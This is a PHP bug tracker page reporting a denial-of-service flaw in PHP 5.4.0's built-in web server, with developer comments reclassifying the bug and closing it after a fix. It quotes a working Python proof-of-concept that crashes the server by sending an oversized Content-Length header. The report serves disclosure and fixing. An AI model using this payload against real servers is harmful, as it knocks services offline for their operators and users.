PHP :: Bug #61509 :: In-built webserver denial-of-service

Bug #61509

In-built webserver denial-of-service

Submitted:

2012-03-26 12:37 UTC

Modified:

2013-08-01 22:19 UTC

Votes:	4
Avg. Score:	3.0 ± 2.0
Reproduced:	1 of 2 (50.0%)
Same Version:	1 (100.0%)
Same OS:	1 (100.0%)

From:

pajoye@php.net

Assigned:

yohgaki (profile)

Status:

Closed

Package:

CGI/CLI related

PHP Version:

5.4.0

OS:

Private report:

CVE-ID:

None

View Add Comment Developer Edit

Welcome! If you don't have a Git account, you can't do anything here.
You can add a comment by following this link or if you reported this bug, you can edit this bug over here.

php.net Username: php.net Password:

Quick Fix:	(description)
	Block user comment
Status:		Assign to:
Package:
Bug Type:
Summary:
From:	pajoye@php.net
New email:
PHP Version:		OS:

New/Additional Comment:

[2012-03-26 12:37 UTC] pajoye@php.net

Description:
------------
PHP version 5.4.0 built-in web server denial of service proof of concept exploit.


via http://packetstormsecurity.org/files/111163/php540-dos.txt

Test script:
---------------
#!/usr/bin/python
 
# Title:      PHP 5.4.0 Built-in Web Server DoS PoC
# Date:       16 March 2012
# Author:     ls (contact@kaankivilcim.com)
# Reference:  https://bugs.php.net/bug.php?id=61461
# Comments:   Fixed in PHP 5.4.1RC1-DEV and 5.5.0-DEV
 
# The value of the Content-Length header is passed directly to a pemalloc() call in sapi/cli/php_cli_server.c
# on line 1538. The inline function defined within Zend/zend_alloc.h for malloc() will fail, and will terminate
# the process with the error message "Out of memory".
#
# 1537 if (!client->request.content) {
# 1538   client->request.content = pemalloc(parser->content_length, 1);
# 1539   client->request.content_len = 0;
# 1540 }
#
# PHP 5.4.0 Development Server started at Tue Mar 13 19:41:45 2012
# Listening on 127.0.0.1:80
# Document root is /tmp
# Press Ctrl-C to quit.
# Out of memory
 
import socket, sys
 
target = "127.0.0.1"
port   = 80;
 
request  = "POST / HTTP/1.1\n"
request += "Content-Type: application/x-www-form-urlencoded\n"
request += "Content-Length: 2147483638\n\n" # <-- Choose size larger than the available memory on target
request += "A=B\n\n"
 
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
 
try:
  s.connect((target, port))
except:
  print "[-] Connection to %s:%s failed!" % (target, port)
  sys.exit(0)
 
print "[+] Sending HTTP request. Check for crash on target."
 
s.send(request)
s.close()

Patches

Add a Patch

Pull Requests

Add a Pull Request

History

AllCommentsChangesGit/SVN commitsRelated reports

[2012-03-27 20:03 UTC] sixd@php.net

-Summary: DOS +Summary: In-built webserver denial-of-service

[2012-03-27 20:03 UTC] sixd@php.net

For the record, note the comment in the documentation:
"This web server is designed for developmental purposes only, and should not be 
used in production."

[2012-03-27 20:06 UTC] stas@php.net

-Type: Security +Type: Bug

[2012-03-27 20:07 UTC] stas@php.net

Built-in webserver is a development module, I see no reason to classify bugs on 
it as security.

[2013-08-01 22:19 UTC] yohgaki@php.net

-Status: Open +Status: Closed -Assigned To: +Assigned To: yohgaki

[2013-08-01 22:19 UTC] yohgaki@php.net

Current code compare the length of parsed data and ignore as invalid request.

	php.net \| support \| documentation \| report a bug \| advanced search \| search howto \| statistics \| random bug \| login
go to bug id or search bugs for


Copyright © 2001-2024 The PHP Group All rights reserved.	Last updated: Fri Apr 19 06:01:29 2024 UTC